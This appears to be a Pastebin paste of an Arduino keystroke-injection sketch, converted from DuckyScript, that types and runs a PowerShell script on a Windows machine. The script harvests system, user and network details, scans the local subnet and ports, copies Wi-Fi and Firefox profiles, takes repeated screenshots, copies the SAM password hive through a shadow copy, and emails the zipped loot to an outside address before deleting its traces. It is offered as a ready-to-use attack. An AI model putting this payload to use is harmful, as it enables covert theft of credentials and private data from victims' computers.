Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /* Converted by Duckuino:
- * https://forums.hak5.org/index.php?/topic/32719-payload-converter-duckuino-duckyscript-to-arduino/?p=244590
- * Enjoy!
- */
- void setup() {
- Keyboard.begin();
- delay(750);
- type(KEY_LEFT_GUI,false);
- type('r',false);
- Keyboard.releaseAll();
- delay(750);
- print(F("powershell Start-Process notepad -Verb runAs"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- delay(750);
- type(KEY_LEFT_ALT,false);
- type('y',false);
- Keyboard.releaseAll();
- delay(750);
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- type(KEY_LEFT_ALT,false);
- Keyboard.releaseAll();
- delay(750);
- print(F("m"));
- delay(750);
- for(int i = 0; i < 51; i++) {
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- }
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$folderDateTime = (get-date).ToString('d-M-y HHmmss')"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$userDir = (Get-ChildItem env:\\userprofile).value + '\\Ducky Report ' + $folderDateTime"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$fileSaveDir = New-Item ($userDir) -ItemType Directory"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$date = get-date"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$style = \"<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>\""));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report +\"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>\""));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$SysBootTime = Get-WmiObject Win32_OperatingSystem"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$BootTime = $SysBootTime.ConvertToDateTime($SysBootTime.LastBootUpTime)| ConvertTo-Html datetime"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$SysSerialNo = (Get-WmiObject -Class Win32_OperatingSystem -ComputerName $env:COMPUTERNAME)"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$SerialNo = $SysSerialNo.SerialNumber"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$SysInfo = Get-WmiObject -class Win32_ComputerSystem -namespace root/CIMV2 | Select Manufacturer,Model"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$SysManufacturer = $SysInfo.Manufacturer"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$SysModel = $SysInfo.Model"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$OS = (Get-WmiObject Win32_OperatingSystem -computername $env:COMPUTERNAME ).caption"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$disk = Get-WmiObject Win32_LogicalDisk -Filter \"DeviceID='C:'\""));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$HD = [math]::truncate($disk.Size / 1GB)"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$FreeSpace = [math]::truncate($disk.FreeSpace / 1GB)"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$SysRam = Get-WmiObject -Class Win32_OperatingSystem -computername $env:COMPUTERNAME | Select TotalVisibleMemorySize"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Ram = [Math]::Round($SysRam.TotalVisibleMemorySize/1024KB)"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$SysCpu = Get-WmiObject Win32_Processor | Select Name"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Cpu = $SysCpu.Name"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$HardSerial = Get-WMIObject Win32_BIOS -Computer $env:COMPUTERNAME | select SerialNumber"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$HardSerialNo = $HardSerial.SerialNumber"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$SysCdDrive = Get-WmiObject Win32_CDROMDrive |select Name"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$graphicsCard = gwmi win32_VideoController |select Name"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$graphics = $graphicsCard.Name"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$SysCdDrive = Get-WmiObject Win32_CDROMDrive |select -first 1"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$DriveLetter = $CDDrive.Drive"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$DriveName = $CDDrive.Caption"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Disk = $DriveLetter + '' + $DriveName"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Firewall = New-Object -com HNetCfg.FwMgr"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$FireProfile = $Firewall.LocalPolicy.CurrentProfile"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$FireProfile = $FireProfile.FirewallEnabled"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + \"<div id=left><h3>Computer Information</h3><br><table><tr><td>Operating System</td><td>$OS</td></tr><tr><td>OS Serial Number:</td><td>$SerialNo</td></tr><tr><td>Current User:</td><td>$env:USERNAME </td></tr><tr><td>System Uptime:</td><td>$BootTime</td></tr><tr><td>System Manufacturer:</td><td>$SysManufacturer</td></tr><tr><td>System Model:</td><td>$SysModel</td></tr><tr><td>Serial Number:</td><td>$HardSerialNo</td></tr><tr><td>Firewall is Active:</td><td>$FireProfile</td></tr></table></div><div id=right><h3>Hardware Information</h3><table><tr><td>Hardrive Size:</td><td>$HD GB</td></tr><tr><td>Hardrive Free Space:</td><td>$FreeSpace GB</td></tr><tr><td>System RAM:</td><td>$Ram GB</td></tr><tr><td>Processor:</td><td>$Cpu</td></tr><td>CD Drive:</td><td>$Disk</td></tr><tr><td>Graphics Card:</td><td>$graphics</td></tr></table></div>\""));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$UserInfo = Get-WmiObject -class Win32_UserAccount -namespace root/CIMV2 | Where-Object {$_.Name -eq $env:UserName}| Select AccountType,SID,PasswordRequired"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$UserType = $UserInfo.AccountType"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$UserSid = $UserInfo.SID"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$UserPass = $UserInfo.PasswordRequired"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$IsAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator')"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report +\"<div id=left><h3>User Information</h3><br><table><tr><td>Current User Name:</td><td>$env:USERNAME</td></tr><tr><td>Account Type:</td><td> $UserType</td></tr><tr><td>User SID:</td><td>$UserSid</td></tr><tr><td>Account Domain:</td><td>$env:USERDOMAIN</td></tr><tr><td>Password Required:</td><td>$UserPass</td></tr><tr><td>Current User is Admin:</td><td>$IsAdmin</td></tr></table>\""));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + '</div>'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F(" $u = 0"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$allUsb = @(get-wmiobject win32_volume | select Name, Label, FreeSpace)"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + '<div id=right><h3>USB Devices</h3><table>'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("do {"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$gbUSB = [math]::truncate($allUsb[$u].FreeSpace / 1GB)"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + \"<tr><td>Drive Name: </td><td> + \" $allUsb[$u].Name + $allUsb[$u].Label + \"</td><td>Free Space: </td><td>\" + $gbUSB + \"GB</td></tr>STRING Write-Output $fullUSB\""));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$u ++"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("} while ($u -lt $allUsb.Count)"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + '</table></div>'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + '<div id=left><h3>Shared Drives/Devices</h3>'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + (GET-WMIOBJECT Win32_Share | convertto-html Name, Description, Path)"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + '</div>'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + '<div id=center><h3> Installed Programs</h3> '"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + (Get-WmiObject -class Win32_Product | ConvertTo-html Name, Version,InstallDate)"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + '</table></div>'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + '<div id=center><h3> Installed Updates</h3>'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + (Get-WmiObject Win32_QuickFixEngineering -ComputerName $env:COMPUTERNAME | sort-object -property installedon -Descending | ConvertTo-Html Description, HotFixId,Installedon,InstalledBy)"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + '</div>'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + '<div id=center><h3>User Documents (doc,docx,pdf,rar)</h3>'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + (Get-ChildItem -Path $userDir -Include *.doc, *.docx, *.pdf, *.zip, *.rar -Recurse |convertto-html Directory, Name, LastAccessTime)"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + '</div>'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + '<div id=center><h3>Network Information</h3>'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + (Get-WmiObject Win32_NetworkAdapterConfiguration -filter 'IPEnabled= True' | Select Description,DNSHostname, @{Name='IP Address ';Expression={$_.IPAddress}}, MACAddress | ConvertTo-Html)"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + '</table></div>'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$IP = Get-WmiObject Win32_NetworkAdapterConfiguration -Filter 'IPEnabled = True' | Select IPAddress -First 1"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$IPAddr = $IP.IPAddress | Select-Object -Index 0"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$IPAddr -as [String]"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$IPa = $IPAddr.Split('.') | Select -Index 0"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$IPb = $IPAddr.Split('.') | Select -Index 1"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$IPc = $IPAddr.Split('.') | Select -Index 2"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$IPAddr = $IPa + '.' + $IPb + '.' + $IPc + '.'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Ping = new-object System.Net.Networkinformation.Ping"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$ScanResults = 1..255| ForEach-Object {($Ping).Send($IpAddr + $_) } | Where-Object {$_.Status -eq 'Success'} | select Address"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$x = 0"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + '<div id=center><h3>Network Scan Results</h3><table>'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("do {"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$IPResults = $ScanResults | Select-Object -Index $x"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$CompInfo = Get-WmiObject Win32_OperatingSystem -Computer $IPResults.Address | Select RegisteredUser, SystemDirectory"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$CompName = (Get-WmiObject Win32_OperatingSystem -Computer $IPResults.Address).csname"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$CurrIP = $IPResults.Address.IPAddressToString"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$CurrOS = $CompInfo.SystemDirectory"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$CurrName = $CompInfo.RegisteredUser"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("if ($CompInfo -ne $null){"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + '<tr><td><b>IP Address:</b></td><td>' + $CurrIP + '</td><td><b>Compter Name: </b></td><td>' + $CompName + '</td><td><b>User Name: </b></td><td>' + $CurrName + '</td> <td><b>OS:</b> </td><td>' + $CurrOS + '</td></tr><br>'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("}else{"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + '<tr><td><b>IP Address: </b></td><td>' + $CurrIP + '</td><td><b>Computer Name: </b></td><td>NOT KNOWN</td><td><b>User Name: </b></td><td>NOT KNOWN</td><td><b>OS:</b></td><td>NOT KNOWN</td></tr><br>'}"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$x ++"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("} while ($x -lt $ScanResults.Count)"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + '</table></div>'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Computer = $env:COMPUTERNAME"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$PortList = 0, 21, 22, 23, 25, 79, 80, 110, 113, 119, 135, 137, 139, 143, 389, 443, 445, 1002, 1024, 1030, 1720, 1900, 5000, 8080"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + '<div id=right><h3>Port Scan of ' + $Computer + '</h3><table>'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("foreach ($PortNumber in $PortList) {"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$PortCheck = New-Object Net.Sockets.TcpClient"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$PortCheck.Connect($Computer, $PortNumber)"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("if ($PortCheck.Connected) {"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + '<tr><td><b><font color=red>Port ' + $PortNumber + ' is open</font></b></td></tr>'}"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("else {$Report = $Report + '<tr><td>Port ' + $PortNumber + ' is closed</td></tr>'}}"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report = $Report + '</table></div>'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$wlanSaveDir = New-Item $userDir'/Duck/WLAN_PROFILES' -ItemType Directory"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$srcDir = 'C:/ProgramData/Microsoft/Wlansvc/Profiles/Interfaces'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("Copy-Item $srcDir $wlanSaveDir -Recurse"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$jpegSaveDir = New-Item $fileSaveDir'/Screenshots' -ItemType Directory"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$displayInfo = Get-WmiObject Win32_DesktopMonitor | Where {$_.Name -eq 'Default Monitor'}| Select ScreenHeight, ScreenWidth"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$displayWidth = $displayInfo.ScreenWidth"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$displayHeight = $displayInfo.ScreenHeight"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("[System.Reflection.Assembly]::LoadWithPartialName(\"System.Drawing\")"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$x = 0"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("do { Start-Sleep -Seconds 60"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$jpegName = (get-date).ToString('HHmmss')"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$image = new-object System.Drawing.Bitmap 1366 ,768"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$imageSize = New-object System.Drawing.Size $displayWidth,$displayHeight"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$screen = [System.Drawing.Graphics]::FromImage($image)"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$screen.copyfromscreen(0,0,0,0, $imageSize,([System.Drawing.CopyPixelOperation]::SourceCopy))"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$image.Save(\"$jpegSaveDir/$jpegName.jpeg\",([system.drawing.imaging.imageformat]::jpeg));"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$x++ } while ($x -ne 60);"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F(" $fireSaveDir = New-Item $userDir'\\Duck\\FireFox-Profile' -ItemType Directory"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$fireDir = $userDir + '\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$getFire = Get-Item -Path $fireDir -Exclude extensions"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("Copy-Item $getFire $fireSaveDir -Recurse"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("Start-Sleep -s 10"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$createShadow = (gwmi -List Win32_ShadowCopy).Create('C:\\', 'ClientAccessible')"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$shadow = gwmi Win32_ShadowCopy | ? { $_.ID -eq $createShadow.ShadowID }"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$addSlash = $shadow.DeviceObject + ''"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("cmd /c mklink C:\\shadowcopy $addSlash"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("Copy-Item 'C:\\shadowcopy\\Windows\\System32\\config\\SAM' $fileSaveDir"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("Remove-Item -recurse -force 'C:\\shadowcopy'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$Report >> $fileSaveDir'/ComputerInfo.html'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("function copy-ToZip($fileSaveDir){"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$srcdir = $fileSaveDir"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$zipFile = 'C:\\Windows\\Report.zip'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("if(-not (test-path($zipFile))) {"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("set-content $zipFile (\"PK\" + [char]5 + [char]6 + (\"$([char]0)\" * 18))"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("(dir $zipFile).IsReadOnly = $false}"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$shellApplication = new-object -com shell.application"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$zipPackage = $shellApplication.NameSpace($zipFile)"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$files = Get-ChildItem -Path $srcdir"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("foreach($file in $files) {"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$zipPackage.CopyHere($file.FullName)"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("while($zipPackage.Items().Item($file.name) -eq $null){"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("Start-sleep -seconds 1 }}}"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("copy-ToZip($fileSaveDir)"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$SMTPServer = 'smtp.gmail.com'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$SMTPInfo.EnableSsl = $true"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential'mail', 'psswd');"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$ReportEmail = New-Object System.Net.Mail.MailMessage"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$ReportEmail.From = 'tim241@ziggo.nl'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$ReportEmail.To.Add('tim241@ziggo.nl')"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$ReportEmail.Subject = 'Duck Toolkit Recon Report'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$ReportEmail.Body = 'Please find attached your reconnaissance report.'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$ReportEmail.Attachments.Add('C:\\Windows\\Report.zip')"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("$SMTPInfo.Send($ReportEmail)"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("remove-item $fileSaveDir -recurse"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("remove-item 'C:\\Windows\\Report.zip'"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- print(F("Remove-Item $MyINvocation.InvocationName"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- type(KEY_LEFT_CTRL,false);
- type('S',false);
- Keyboard.releaseAll();
- delay( 750);
- print(F("C:\\Windows\\config-6fee6.ps1"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- delay(750);
- type(KEY_LEFT_ALT,false);
- type('F',false);
- Keyboard.releaseAll();
- delay(750);
- type(KEY_LEFT_GUI,false);
- type('r',false);
- Keyboard.releaseAll();
- delay(750);
- print(F("powershell Start-Process cmd -Verb runAs"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- delay(750);
- type(KEY_LEFT_ALT,false);
- type('y',false);
- Keyboard.releaseAll();
- delay(750);
- print(F("mode con:cols=14 lines=1"));
- type(KEY_RETURN,false);
- Keyboard.releaseAll();
- type(KEY_LEFT_ALT,false);
- Keyboard.releaseAll();
- delay(750);
- print(F("m"));
- delay(750);
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- for(int i = 0; i < 70; i++) {
- type(KEY_DOWN_ARROW,false);
- Keyboard.releaseAll();
- }
- Keyboard.end();
- }
- void type(int key, boolean release) {
- Keyboard.press(key);
- if(release)
- Keyboard.release(key);
- }
- void print(const __FlashStringHelper *value) {
- Keyboard.print(value);
- }
- void loop(){}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement